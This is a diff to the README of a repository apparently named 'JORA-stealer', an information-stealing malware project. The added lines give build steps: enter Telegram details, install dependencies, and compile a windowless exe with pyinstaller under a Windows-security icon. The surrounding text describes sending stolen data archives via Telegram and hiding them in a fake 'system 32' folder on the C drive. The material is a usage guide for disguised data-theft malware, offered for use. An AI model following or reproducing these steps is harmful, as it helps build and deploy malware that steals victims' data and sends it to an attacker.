virus242/JORA-stealer/README.md

 * Sending data archives via telegram
 ---
+## USE

+You need to pull the project fromthe repository.

+Fill in the details of your telegram.

+Install all libraries from requirements.txt , start the virtual environment and run the command

+pyinstaller --onefile -w --icon=img\windows-security-new.png main.py

+which is located in the command to create file exe.txt.

+The result is an exe file ready to work.

+---
 ### The work process is the following.

 The directory "system 32" is created on the C drive, three new folders are already created inside it for storing data.